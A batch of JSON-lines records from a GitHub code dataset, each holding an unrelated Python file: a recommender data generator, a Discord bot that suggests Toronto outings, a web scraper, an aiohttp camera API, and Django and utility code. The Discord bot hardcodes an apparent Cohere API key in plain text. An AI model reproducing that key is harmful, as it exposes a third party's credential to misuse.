numpy.array([self.rating_cache[user2][item] for item in items2])\n common_ratings1 = numpy.array([self.rating_cache[user1][item] for item in common_items])\n common_ratings2 = numpy.array([self.rating_cache[user2][item] for item in common_items])\n\n temp = ((common_ratings1 - common_ratings1.mean()) * (common_ratings2 - common_ratings2.mean())).sum()\n sim = math.sqrt(len(common_items)) * temp / (ratings1.std() * ratings2.std())\n\n if numpy.isnan(sim):\n sim = - numpy.inf\n return sim\n\n def get_user_ref_review_in_one(self, user_id: int, exclude_item: int):\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select y.userID as refUser, y.itemID as refItem \"\n f\"from {self.table_name} as x inner join {self.table_name} as y on x.itemID == y.itemID \"\n f\"where x.userID == {user_id} \"\n f\"and x.userID != y.userID \"\n f\"and y.itemID != {exclude_item}\")\n\n reviews, review_count = self.read_review_in_one_from_db(cursor, REVIEW_COUNT)\n return reviews\n\n def write_pos_review(self, train_data: TrainDataFile, idx, user, item):\n reviews, user_ids, item_ids = self.get_user_item_pos_review(user, item, \"user_review\")\n chunk_len = len(reviews)\n if chunk_len > 0:\n train_data.user_pos_review[idx, 0:chunk_len] = reviews\n train_data.user_pos_user_id[idx, 0:chunk_len] = user_ids\n train_data.user_pos_item_id[idx, 0:chunk_len] = item_ids\n\n reviews, user_ids, item_ids = self.get_user_item_pos_review(item, user, \"item_review\")\n chunk_len = len(reviews)\n if chunk_len > 0:\n train_data.item_pos_review[idx, 0:chunk_len] = reviews\n train_data.item_pos_user_id[idx, 0:chunk_len] = user_ids\n train_data.item_pos_item_id[idx, 0:chunk_len] = item_ids\n\n def get_user_item_pos_review(self, query_id: int, exclude_id: int, review_type: str):\n if review_type == \"user_review\":\n query_key = \"userID\"\n join_key = \"itemID\"\n else:\n query_key = \"itemID\"\n join_key = \"userID\"\n\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select y.userID as refUser, y.itemID as refItem \"\n f\"from {self.table_name} as x inner join {self.table_name} as y on x.{join_key} == y.{join_key} \"\n f\"where x.{query_key} == {query_id} \"\n f\"and x.{query_key} != y.{query_key} \"\n f\"and y.{join_key} != {exclude_id} \"\n f\"and abs(x.rating - y.rating) <= 1\")\n\n # Sample REVIEW_COUNT reviews.\n # TODO Better review choice policy\n cursor = self.reservoir_sampling(cursor, REVIEW_COUNT)\n\n reviews, user_ids, item_ids = [], [], []\n for row in cursor:\n reviews.append(self.review_cache[row[0]][row[1]])\n user_ids.append(row[0])\n item_ids.append(row[1])\n\n return reviews, user_ids, item_ids\n\n def write_ref_review(self, train_data: TrainDataFile, idx, user, item):\n reviews, user_ids, item_ids, self_rating, other_rating = self.get_user_item_ref_review(user, item, \"user_review\")\n chunk_len = len(reviews)\n if chunk_len > 0:\n train_data.user_ref_review[idx, 0:chunk_len] = reviews\n train_data.user_ref_user_id[idx, 0:chunk_len] = user_ids\n train_data.user_ref_item_id[idx, 0:chunk_len] = item_ids\n train_data.user_ref_self_rating[idx, 0:chunk_len] = self_rating\n train_data.user_ref_other_rating[idx, 0:chunk_len] = other_rating\n\n reviews, user_ids, item_ids, self_rating, other_rating = self.get_user_item_ref_review(item, user, \"item_review\")\n chunk_len = len(reviews)\n if chunk_len > 0:\n train_data.item_ref_review[idx, 0:chunk_len] = reviews\n train_data.item_ref_user_id[idx, 0:chunk_len] = user_ids\n train_data.item_ref_item_id[idx, 0:chunk_len] = item_ids\n train_data.item_ref_self_rating[idx, 0:chunk_len] = self_rating\n train_data.item_ref_other_rating[idx, 0:chunk_len] = other_rating\n\n def get_user_item_ref_review(self, query_id: int, exclude_id: int, review_type: str):\n\n if review_type == \"user_review\":\n query_key = \"userID\"\n join_key = \"itemID\"\n else:\n query_key = \"itemID\"\n join_key = \"userID\"\n\n c = self.db_conn.cursor()\n cursor = c.execute(f\"select y.userID as refUser, y.itemID as refItem, x.rating as selfRating, y.rating as otherRating \"\n f\"from {self.table_name} as x inner join {self.table_name} as y on x.{join_key} == y.{join_key} \"\n f\"where x.{query_key} == {query_id} \"\n f\"and x.{query_key} != y.{query_key} \"\n f\"and y.{join_key} != {exclude_id}\")\n\n # Sample REVIEW_COUNT reviews.\n # TODO Better review choice policy\n cursor = self.reservoir_sampling(cursor, REVIEW_COUNT)\n\n reviews, user_ids, item_ids, self_rating, other_rating = [], [], [], [], []\n for row in cursor:\n reviews.append(self.review_cache[row[0]][row[1]])\n user_ids.append(row[0])\n item_ids.append(row[1])\n self_rating.append(row[2])\n other_rating.append(row[3])\n\n return reviews, user_ids, item_ids, self_rating, other_rating\n\n def reservoir_sampling(self, cursor, sample_k: int):\n \"\"\"\n Memory friendly sample method.\n https://www.geeksforgeeks.org/reservoir-sampling/\n \"\"\"\n result = []\n for t, item in enumerate(cursor):\n if t < sample_k:\n result.append(item)\n else:\n m = self.rand.randint(0, t)\n if m < sample_k:\n result[m] = item\n return result\n\n\ndef generate_train_data(data_set: DataSetEnum):\n logger.info(\"loading processed data...\")\n all_data = load_processed_data(data_set)\n train, dev, test = split_train_dev_test_data(all_data)\n\n data_util = DataUtil(train, train, data_set, DataTypeEnum.Train)\n data_util.create_data_file()\n\n data_util = DataUtil(dev, pandas.concat([train, dev]), data_set, DataTypeEnum.Dev)\n data_util.create_data_file()\n\n data_util = DataUtil(test, all_data, data_set, DataTypeEnum.Test)\n data_util.create_data_file()\n\n\ndef main():\n overwrite = False\n for data_set in get_all_dataset():\n logger.info(f\"-------- Creating train data for {data_set}... --------\")\n train_data_path = TRAIN_DATA_PATH % (data_set, DataTypeEnum.Train)\n processed = ROOT_DIR.joinpath(train_data_path).exists()\n if not overwrite and processed:\n logger.warning(f\"{data_set} is skipped because processed file already exist.\")\n continue\n\n generate_train_data(data_set)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KindRoach/HRFA","sub_path":"data_process/data_reader/generate_train_data.py","file_name":"generate_train_data.py","file_ext":"py","file_size_in_byte":17877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"34394268570","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 31 11:23:33 2019\n\n@author: FQ538HD\n\"\"\"\n\nold_p = 23 # % which were leading to high return rates from clients.\nsignificance = 95 # %\ndesired_p = 18 # %\nn = 150 # spoons\nspoon_defects = 23 # % spoons have defects.\n\nfrom utils import SpoonsData\n\nnew_p = 100 * spoon_defects / n\n\ndata = SpoonsData()\ndata.set_data(p=desired_p)\ndata.proportion_testing_result(n=n, new_mean=new_p, significance=significance)\n","repo_name":"ricardoleoncorreia/statistics-with-python","sub_path":"ex6/ex6.py","file_name":"ex6.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32082431463","text":"#!/usr/bin/env python3\n\n\ndef step1(bin_list): \n gamma = ''\n epsilon = ''\n\n for bit in range(len(bin_list[0])):\n sum_of_0 = sum(number[bit] == '0' for number in bin_list)\n sum_of_1 = sum(number[bit] == '1' for number in bin_list)\n\n gamma += '0' if sum_of_0 > sum_of_1 else '1'\n epsilon += '1' if sum_of_0 > sum_of_1 else '0'\n \n return int(gamma, 2) * int(epsilon, 2)\n \n \ndef step2(bin_list):\n return 0\n\n\nwith open('data.txt', 'r') as file:\n data = file.read().splitlines()\nprint(step1(data))\n","repo_name":"pierre-castro/aoc_2021","sub_path":"Day3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10445088458","text":"from typing import List\n\nfrom django.core.exceptions import ValidationError\n\n\n# LOGGING\nimport logging\nfrom scouts_auth.inuits.logging import InuitsLogger\n\nlogger: InuitsLogger = logging.getLogger(__name__)\n\n\nclass CheckValidator:\n @staticmethod\n def validate(validators: str, value: any, *args, **kwargs) -> bool:\n validators: List[str] = validators.split(\",\")\n\n # logger.debug(\"VALIDATORS: %s\", validators)\n\n for validator in validators:\n if len(validator.strip()) > 0:\n if not hasattr(CheckValidator, validator):\n raise ValidationError(\n \"A validator was defined ({}), but the method is not defined\".format(\n validator\n )\n )\n # logger.debug(\n # \"Validating value %s (%s) with validator %s\",\n # value,\n # type(value).__name__,\n # validator,\n # )\n if not getattr(CheckValidator, validator)(value=value, *args, **kwargs):\n return False\n\n return True\n\n @staticmethod\n def is_number(value: any, *args, **kwargs) -> bool:\n if isinstance(value, int) or isinstance(value, float):\n return True\n return False\n\n @staticmethod\n def is_positive_number(value: any, *args, **kwargs) -> bool:\n return CheckValidator.is_number(value) and int(value) >= 0\n\n @staticmethod\n def validate_estimate(value: any, *args, **kwargs):\n return CheckValidator.is_positive_number(value)\n \n @staticmethod\n def validate_responsible_unique(value, *args, **kwargs):\n from apps.visums.models import LinkedParticipantCheck\n\n linked_participant_check = LinkedParticipantCheck.objects.safe_get(visum=value.sub_category.category.category_set.visum, linked_to=value.parent.linked_to, raise_error=True)\n\n if linked_participant_check.participants.count() > 0 and linked_participant_check.first().participant.group_admin_id == kwargs.get(\"group_admin_id\"):\n raise ValidationError(\"Je mag niet twee keer dezelfde kampverantwoordelijke opgeven.\")\n\n return True\n","repo_name":"ScoutsGidsenVL/kampvisum-backend","sub_path":"scouts_kampvisum_api/apps/visums/utils/check_validator.py","file_name":"check_validator.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10954940209","text":"class Account(object):\n \"\"\"This creates simple bank account\"\"\"\n def __init__(self, name, balance):\n #This method creates account with initial balance\n self.name = name\n self.balance = balance\n\n def deposit(self, amount):\n #this method adds money to account\n if amount >0:\n self.balance += amount\n self.show_balance()\n\n def withdraw(self, amount):\n #this takes mones from account\n if 0/', PostDetailView.as_view(), name='post-detail'),\n path('post/delete//', views.post_delete, name='post-delete'),\n path('post/edit//', PostEditView.as_view(), name='post-edit'),\n path('post/comment/delete//', views.comment_delete, name='comment-delete'),\n path('like/', views.like, name='post-like'),\n path('share//', SharePostView.as_view(), name='share-post'),\n path('inbox/', ListThreads.as_view(), name='inbox'),\n path('inbox/create-thread/', CreateThread.as_view(), name='create-thread'),\n path('inbox//', ThreadView.as_view(), name='message-thread'),\n path('inbox//create-message', CreateMessage.as_view(), name='create-message'),\n path('notification/delete/', DeleteNotificaiton.as_view(), name='delete-notification'),\n path('search_posts/', views.search_posts, name='search_posts'),\n path('search/', views.search, name='search'),\n path('posts/', views.post_page, name='post-page'),\n path('users/create-thread//', views.CreateThreadButton, name='create-thread-button'),\n]\n","repo_name":"thkirby/Group10","sub_path":"feed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24500381412","text":"#!/usr/bin/python\n# ‐*‐ coding: utf‐8 ‐*‐\n\n\"\"\"\ndirtreewalk.\n\nProgramme to list all files and subdirectories of a given directory path. \nThe MD5 sum is calculated for every file.\n\nUsage:\n dirtreewalk.py ...\n dirtreewalk.py -h | --help\n dirtreewalk.py --version\n\nOptions:\n -h --help Show this information.\n --version Show version.\n\n\"\"\"\n\nfrom docopt import docopt\nimport os, sys, hashlib\n\n__author__ = \"Lisa Trage\"\n\n'''\nFunction to recursively list all subdirectories and files of a given directory.\n'''\ndef treewalk(path):\n try:\n all_files = os.listdir(path)\n except (PermissionError):\n print('You do not have permissions to read from this directory: {}.'.format(path))\n return\n except (FileNotFoundError, TypeError):\n print ('You did not enter a valid path.')\n return\n\n for item in all_files:\n full_path = os.path.join(path,item)\n rel_path = create_rel_path(path, item)\n \n if os.path.isdir(full_path):\n print(\"\".ljust(15, ' '), item.ljust(40, ' '), rel_path.ljust(40, ' '))\n treewalk(full_path)\n\n elif os.path.isfile(full_path):\n print(\"\".ljust(15, ' '), item.ljust(40, ' '), rel_path.ljust(40, ' '), calculate_md5_sum(item))\n\n elif os.path.islink(full_path):\n print(\"\".ljust(15, ' '), item.ljust(40, ' '), rel_path.ljust(40, ' '))\n\n else:\n pass\n\n\n\n'''\nFunction to calculate the MD5 sum of a file.\n'''\ndef calculate_md5_sum(item):\n return hashlib.md5(item.encode('utf-8')).hexdigest()\n\n\n\n'''\nFunction to return the path relative to the given directory.\nAll leading symbols (e.g. ../../example) are removed and the file that\nwas passed to the function is appended in the end.\n'''\ndef create_rel_path(path, item):\n rel_path = os.path.relpath(path, start=os.path.curdir)\n rel_path = rel_path.split('/')\n rel_path.append(item)\n try: \n rel_path = [x for x in rel_path if x != '..']\n except ValueError:\n pass\n rel_path.remove(rel_path[0])\n rel_path= '/'.join(rel_path)\n return rel_path\n\n\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='dirtreewalk 1.0')\n treewalk((arguments[''][0]))\n \n ","repo_name":"atleasticode/dirtreewalk","sub_path":"dirtreewalk.py","file_name":"dirtreewalk.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6997151192","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom pprint import pprint\n\n\ndef request_data(num_pages=1):\n links = []\n points = []\n for page in range(1, num_pages+1):\n response = requests.get(f\"https://news.ycombinator.com?p={page}\")\n soup = BeautifulSoup(response.text, \"html.parser\") # converts website data from string to html object\n links += soup.select(\".storylink\")\n subtext = soup.select(\".subtext\") # this is selected before points in the case that points has no value (0)\n for item in subtext:\n points += item.select(\".score\") # therefore, if points = 0, its index will be None\n\n return links, points\n\n\ndef filter_list(formatted_list, min_points):\n filtered = []\n for i in range(len(formatted_list) - 1):\n if int(formatted_list[i][\"points\"]) >= min_points:\n filtered.append(formatted_list[i])\n return filtered\n\n\ndef format_data(links, points):\n new_list = []\n for index in range(len(links) - 1):\n title = links[index].text\n href = links[index].get(\"href\")\n if points[index]:\n # each score object is a list of one item, hence [0]\n score = int(points[index].getText().rstrip(\" points\"))\n else:\n score = 0\n new_list.append({\"title\": title, \"link\": href, \"points\": score})\n\n return new_list\n\n\ndef get_min_points():\n while True:\n try:\n min_points = int(input(\"Enter minimum amount of points: \"))\n if min_points < 0:\n print(\"Points cannot be negative\")\n else:\n break\n except ValueError:\n print(\"Not a number\")\n\n return min_points\n\n\ndef get_num_pages():\n while True:\n try:\n num_pages = int(input(\"Enter number of pages to search through: \"))\n if num_pages < 0:\n print(\"Number of pages cannot be negative\")\n else:\n break\n except ValueError:\n print(\"Not a number\")\n\n return num_pages\n\n\ndef sort_by_points(d):\n sorted_dict = sorted(d, key=lambda k: k[\"points\"], reverse=True) # sorts by the points value for each link\n\n return sorted_dict\n\n\ndef main():\n min_points = get_min_points()\n num_pages = get_num_pages()\n response = request_data(num_pages)\n\n links = response[0]\n points = response[1]\n formatted = format_data(links, points)\n filtered = filter_list(formatted, min_points)\n sorted_list = sort_by_points(filtered)\n\n return sorted_list\n\n\nif __name__ == \"__main__\":\n articles = main()\n\n pprint(articles)\n print(f\"\\nFound {len(articles)} articles\")\n","repo_name":"Will-Fahie/hacker-news-data-scraper","sub_path":"hacker_news_scraper.py","file_name":"hacker_news_scraper.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43190509569","text":"from aiohttp import web\n\nlast_image = None\n\n\nclass WebHandler():\n def __init__():\n pass\n\n\nasync def web_index(request):\n return web.Response(text = 'Hello Aiohttp!')\n\nasync def web_binary_image(request):\n if last_image is None:\n response = web.Response(\n status = 500,\n text = \"Request failed\"\n )\n else:\n response = web.Response(\n status = 200,\n content_type = 'text/plain',\n body = last_image\n )\n return response\n\nasync def web_resolution(request):\n width, height = camera.resolution\n\n response = web.Response(\n status = 200,\n text = \"{}x{}\".format(width, height)\n )\n return response\n\nasync def web_framerate(request):\n fr = float(camera.framerate)\n response = web.Response(\n status = 200,\n content_type = 'text/plain',\n text = str(fr)\n )\n return response\n\nasync def web_shutter_speed(request):\n sh = camera.shutter_speed\n response = web.Response(\n status = 200,\n content_type = 'text/plain',\n text = str(sh)\n )\n return response\n\nasync def web_exposure_mode(request):\n response = web.Response(\n status = 200,\n content_type = 'text/plain',\n text = camera.exposure_mode\n )\n return response\n\nasync def web_set_exposure_mode(request):\n try:\n camera.exposure_mode = await request.text()\n response = web.Response(\n status = 200\n )\n return response\n except Exception as e:\n logger.exception(\"Failed to set exposure mode\")\n response = web.Response(\n status = 500,\n text = str(e)\n )\n return response\n\nasync def web_set_resolution(request):\n try:\n camera.resolution = await request.text()\n response = web.Response(\n status = 200\n )\n return response\n except Exception as e:\n logger.exception(\"Failed to set resolution\")\n response = web.Response(\n status = 500,\n text = str(e)\n )\n return response\n\nasync def web_set_framerate(request):\n try:\n camera.framerate = await request.text()\n response = web.Response(\n status = 200\n )\n return response\n except Exception as e:\n logger.exception(\"Failed to set framerate\")\n response = web.Response(\n status = 500,\n text = str(e)\n )\n return response\n\n\nasync def web_thing_description(request):\n host = platform.node()\n desc = {\n \"name\": host,\n \"mac_address\": get_local_mac(),\n \"type\": \"camera\",\n \"description\": \"PiCamera\",\n \"properties\": {\n \"resolution\": {\n \"type\": \"string\",\n \"description\": \"The current camera resolution\",\n \"href\": \"/properties/resolution\"\n },\n \"framerate\": {\n \"type\": \"string\",\n \"description\": \"The current camera frame rate\",\n \"href\": \"/properties/framerate\"\n },\n \"shutterSpeed\": {\n \"type\": \"number\",\n \"description\": \"The current camera shutter speed\",\n \"href\": \"/properties/shutterSpeed\"\n },\n \"exposureMode\": {\n \"type\": \"string\",\n \"description\": \"The current camera exposure mode\",\n \"href\": \"/properties/exposureMode\"\n }\n }\n }\n response = web.Response(\n status = 200,\n content_type = 'application/json',\n body = json.dumps(desc).encode('utf-8')\n )\n return response\n\nasync def web_loop():\n logger.info('Starting web loop...')\n\n app = web.Application()\n app.router.add_get('/', web_index)\n app.router.add_get('/webthing', web_thing_description)\n\n app.router.add_get('/properties/stillImage', web_binary_image)\n app.router.add_get('/properties/resolution', web_resolution)\n app.router.add_get('/properties/framerate', web_framerate)\n app.router.add_get('/properties/shutterSpeed', web_shutter_speed)\n app.router.add_get('/properties/exposureMode', web_exposure_mode)\n\n app.router.add_put('/properties/exposureMode', web_set_exposure_mode)\n app.router.add_put('/properties/resolution', web_set_resolution)\n app.router.add_put('/properties/framerate', web_set_framerate)\n\n runner = web.AppRunner(app)\n await runner.setup()\n site = web.TCPSite(runner, '0.0.0.0', 80)\n await site.start()\n","repo_name":"infincia/pi-sensor","sub_path":"webapi.py","file_name":"webapi.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36232735706","text":"# 나누어 떨어지는 숫자 배열\r\n# 1차 시도 통과\r\n\r\n\r\ndef solution(arr, divisor):\r\n answer = list(i for i in arr if i % divisor == 0)\r\n if len(answer) == 0:\r\n return [-1]\r\n return sorted(answer)\r\n\r\nprint(solution([5, 9, 7 ,10], 5))\r\n\r\n\r\n'''\r\n타인풀이\r\n\r\ndef solution(arr, divisor): return sorted([n for n in arr if n%divisor == 0]) or [-1]\r\n\r\n한줄풀이\r\nreturn sorted([n for n in arr if n % divisor == 0]) or [-1]\r\nlist_a or list_b는 \r\nlist_a가 거짓일때 list_b가 호출됨\r\n즉 list_a가 비어있을때 list_b 호출\r\n\r\n'''","repo_name":"jomujin/Skill_Check","sub_path":"PROGRAMMERS_SKILLCHECK/SC_level1/SC_level1_12910.py","file_name":"SC_level1_12910.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11628919623","text":"from django.core.management import BaseCommand\nfrom django.core.management.color import no_style\nfrom django.db import connection\nfrom django.db.models import RestrictedError\n\nfrom resumes_vacancies.models import DirectionsModel, WorkTimeModel\n\n\nclass Command(BaseCommand):\n __directions = [\n 'IT, комп\\'ютери, інтернет',\n 'Адмiнiстрацiя, керівництво середньої ланки',\n 'Будівництво, архітектура',\n 'Бухгалтерія, аудит, секретаріат, діловодство, АГВ',\n 'Готельно-ресторанний бізнес, туризм, сфера обслуговування',\n 'Дизайн, творчість',\n 'ЗМІ, видавництво, поліграфія',\n 'Краса, фітнес, спорт',\n 'Культура, музика, шоу-бізнес',\n 'Логістика, склад, ЗЕД',\n 'Маркетинг, реклама, PR, телекомунікації та зв\\'язок',\n 'Медицина, фармацевтика',\n 'Нерухомість',\n 'Освіта, наука',\n 'Охорона, безпека',\n 'Продаж, закупівля',\n 'Робочі спеціальності, виробництво',\n 'Роздрібна торгівля',\n 'Сільське господарство, агробізнес',\n 'Транспорт, автобізнес',\n 'Фінанси, банк',\n 'Управління персоналом, HR',\n 'Юриспруденція',\n ]\n\n __work_times = [\n 'Повна зайнятість',\n 'Неповна зайнятість',\n 'Дистанційна робота',\n ]\n\n def handle(self, *args, **options):\n try:\n DirectionsModel.objects.all().delete()\n WorkTimeModel.objects.all().delete()\n\n sequence_sql = connection.ops.sequence_reset_sql(no_style(), [DirectionsModel, WorkTimeModel])\n with connection.cursor() as cursor:\n for sql in sequence_sql:\n cursor.execute(sql)\n\n for i in self.__directions:\n entity = DirectionsModel(\n direction=i\n )\n entity.save()\n print('Added direction:', i)\n\n for i in self.__work_times:\n entity = WorkTimeModel(\n work_time=i\n )\n entity.save()\n print('Added work time:', i)\n print('Finish')\n except RestrictedError:\n pass\n","repo_name":"mmeerrccyy/profcom_api","sub_path":"resumes_vacancies/management/commands/setup_database.py","file_name":"setup_database.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35138715394","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 15 21:05:21 2017\n\n@author: chris\n\n\nThis will download the necessary files from Tatoeba. These files contain \nthe relationsships between the different langauge sentences, the sentences with\naudio, the user etc.\n\nIt will also download ffmpeg which is needed to handle the audio files and \ncombine them. It will place the file in the needed folder\n\"\"\"\n\nimport tarfile\nimport os\nimport re\nimport urllib.request\nimport subprocess\n\ndef Download_Tars():\n files = ['http://downloads.tatoeba.org/exports/sentences.tar.bz2',\n 'http://downloads.tatoeba.org/exports/links.tar.bz2',\n 'http://downloads.tatoeba.org/exports/sentences_with_audio.tar.bz2']\n \n folder = os.getcwd()\n \n \n for file in files:\n #gets the correct file extension\n name = re.split(r'/',file)[-1]\n filename = os.path.join(folder, name)\n urllib.request.urlretrieve(file,filename)\n \n tar=tarfile.open(filename)\n tar.extractall()\n tar.close()\n \n \n \n'''\n this is a 'utility' used to install packages\n this script will download all of the packages that are needed for \n this project\n'''\nimport pip\n\n\ndef install(package):\n pip.main(['install', package])\n\npackages = ['pydub','urllib.request','os','sys','numpy','pandas','random','sys','site','textstat','subprocess']\n\ndef Install_All():\n for package in packages:\n install(package)\n \n \n'''\nlibav doesn't seem to work as well as ffmpeg so I am not using this.\nI don't know how to edit this for ffmpeg the user need to do this manually \ndef get_ffmpeg():\n \n folder = os.getcwd()\n \n \n #https://stackoverflow.com/questions/2208828/detect-64bit-os-windows-in-python\n def os_arch():\n os_arch = '32-bit'\n if os.name == 'nt':\n output = subprocess.check_output(['wmic', 'os', 'get', 'OSArchitecture'])\n os_arch = output.split()[1]\n else:\n output = subprocess.check_output(['uname', '-m'])\n if 'x86_64' in output:\n os_arch = '64-bit'\n else:\n os_arch = '32-bit'\n return os_arch\n\n \n \n \n if os_arch == '64-bit':\n url = r\"http://builds.libav.org/windows/release-gpl/libav-0.8.17-win64.7z\"\n filename = 'libav-64.7z'\n else:\n url = r\"http://builds.libav.org/windows/release-gpl/libav-0.8.17-win32.7z\"\n filename = 'libav-32.7z'\n \n filename = os.path.join(folder,filename)\n \n urllib.request.urlretrieve(url,filename)\n\n\nprint('what up')\nget_ffmpeg()\n'''\n\nInstall_All()\nDownload_Tars()\n\n","repo_name":"Christhomas17/Tatoeba_Audio_SRS","sub_path":"FirstTime.py","file_name":"FirstTime.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"12713506097","text":"import discord\nfrom discord.ui import Button, View\nfrom discord.ext import commands\nimport json\nfrom os import environ\nfrom dotenv import load_dotenv\nimport clean_file_with_algorithm\nimport cohere\nimport clean_file_with_algorithm as algorithm\n\n\nload_dotenv()\ntoken = environ[\"TOKEN\"]\n\nintents = discord.Intents.all()\n\nclient = commands.Bot(command_prefix='!', intents=intents)\n\noptions = {\"1\": '😄', \"2\": '🙂', \"3\": '😐', \"4\": '🙁', \"5\": '😢'}\ncolours = {\"1\": discord.ButtonStyle.green, \"2\": discord.ButtonStyle.blurple,\n \"3\": discord.ButtonStyle.grey, \"4\": discord.ButtonStyle.blurple,\n \"5\": discord.ButtonStyle.red}\n\nemotions = {\"Stress\": 0, \"Boredom\": 0, \"Loneliness\": 0, \"Anger\": 0,\n \"Sadness\": 0}\n\nanswers = []\n\nemotions_streak = []\n\n\n@client.event\nasync def on_ready():\n print('bot ready')\n\n\nclass MyButton(Button):\n def __init__(self, name, color, emoji, emotion):\n super().__init__(label=name, style=color, emoji=emoji)\n self.emotion = emotion\n\n async def callback(self, interaction: discord.Interaction):\n # ! Update the dictionary\n if ',' in self.emotion:\n emotion1 = self.emotion.split(',')[0].strip()\n emotion2 = self.emotion.split(',')[1].strip()\n else:\n emotion1 = emotion2 = self.emotion\n for key in emotions:\n if key == self.emotion or key == emotion1 or key == emotion2:\n emotions[key] += int(self.label)\n await interaction.response.send_message(\n \"Thanks! Your input of \" + self.label + \" has been recorded.\")\n answers.append(int(self.label))\n\n\nclass MyView(View):\n emotions = emotions\n\n def __init__(self):\n super().__init__() # timeout=10.0)\n\n async def button_callback(self, interaction: discord.Interaction):\n await interaction.response.edit_message(view=self)\n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n # !Help command\n if message.content.startswith('!help'):\n embed_var = discord.Embed(title=\"Help\",\n color=discord.Colour.light_grey())\n embed_var.add_field(name=\"About\",\n value=\"VentBot is a tool that helps you destress!\",\n inline=True)\n embed_var.add_field(name=\"Usage\", value=\"!vent\", inline=False)\n await message.channel.send(embed=embed_var)\n\n # ! Main command\n if message.content == '!vent':\n await message.channel.send(\n \"Hey there, I heard you weren't feeling so great! \")\n await message.channel.send(\"Here are some questions:\")\n\n f = open(\"questions.txt\", \"r\")\n\n for line in f:\n view = MyView()\n current_emotion = line.split(\"(\")[1].split(\")\")[0]\n for index in options:\n button = MyButton(index, colours[index],\n options[index], current_emotion)\n view.add_item(button)\n\n await message.channel.send(line.split(\"(\")[0], view=view)\n await client.wait_for('message')\n\n f.close()\n\n therapy_bot = clean_file_with_algorithm.TherapyTravel(emotions)\n interests = clean_file_with_algorithm.InterestsList()\n output = clean_file_with_algorithm.emotion_giving_method(therapy_bot,\n interests)\n\n co = cohere.Client(\"MSuvC3ORXmJeWIzxj6D9vIw0QZAhfO6ibEmTlDYG\")\n prompt = f\"\\n Name real locations in Toronto I should go to if I like \"\\\n f\"{output}\"\n\n # moddel = medium or xlarge\n response = co.generate(\n model='c1e4d1a2-5127-494b-8536-3d6845a4f267-ft',\n prompt=prompt,\n max_tokens=35,\n temperature=0.9,\n stop_sequences=[\"--\"]\n )\n\n result = response.generations[0].text\n\n embed_var = discord.Embed(title=\"Here is your custom suggestion!\",\n color=discord.Colour.light_grey())\n embed_var.add_field(name=\"Interests\",\n value=output,\n inline=True)\n embed_var.add_field(name=\"Suggestion\", value=result, inline=False)\n await message.channel.send(embed=embed_var)\n\n\n\nclient.run(token)\n","repo_name":"alexszokolay/Uoft-ECKS","sub_path":"new-en/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"9424564242","text":"import numpy as np\nimport os\nimport time\nimport matplotlib.pyplot as plt\nimport random\n\n\nfrom utility.utility_plot import plot_per_b_size, plotRegressions, plotIntersections, plot_per_b_size_folds\nfrom utility.load_dt import load_dt_model\nfrom utility.my_k_fold_cv import load_folds, my_cv_score\n\nfrom sklearn.metrics import r2_score, mean_absolute_percentage_error, balanced_accuracy_score\nfrom sklearn.base import clone\n\n\nfrom modelClass.LR3M import LR3M\n\n# -----------------------------------------------------------\n# Create and test the models LRNNZB.\n#\tLRNNZB (a) is a model that takes as input the number\n#\tof non-zero elements of the right-hand side and predicts\n#\tthe time taken for an algorithm. LRNNZB (b) is another \n#\tmodel that will take also the size of b.\n#\n#\tThis file wil read the folds \"datasets/mydt/folds\" and \n# \tplot a series of figures comparing LRNNZB (a) and (b) in\n#\tplots/compareLRNNZB\n# -----------------------------------------------------------\n\n\ndef pred_time_cv(folds, indices_used_per_method, modelGeneral, model2Phase, model1Phase, modelName = None):\n\t\n\tr2_train_folds = np.zeros((len(folds), 3))\n\tr2_test_folds = np.zeros((len(folds), 3))\n\n\tbas = np.zeros(len(folds))\n\n\tfold_model_choice_time = np.zeros(len(folds))\n\tfold_best_choice_time = np.zeros(len(folds))\n\tfold_average_choice_time = np.zeros(len(folds))\n\tfold_choose_1phase_time = np.zeros(len(folds))\n\tfold_pred_time = np.zeros(len(folds))\n\n\n\tfold_pred_algo = []\n\tfold_best_algo = []\n\n\n\n\tfor i in range(len(folds)):\n\n\t\tprint(\"Fold %d\"%(i))\n\t\tmodelCloneGeneral = clone(modelGeneral)\n\t\tmodelClone2Phase = clone(model2Phase)\n\t\tmodelClone1Phase = clone(model1Phase)\n\n\n\t\tfold_test = 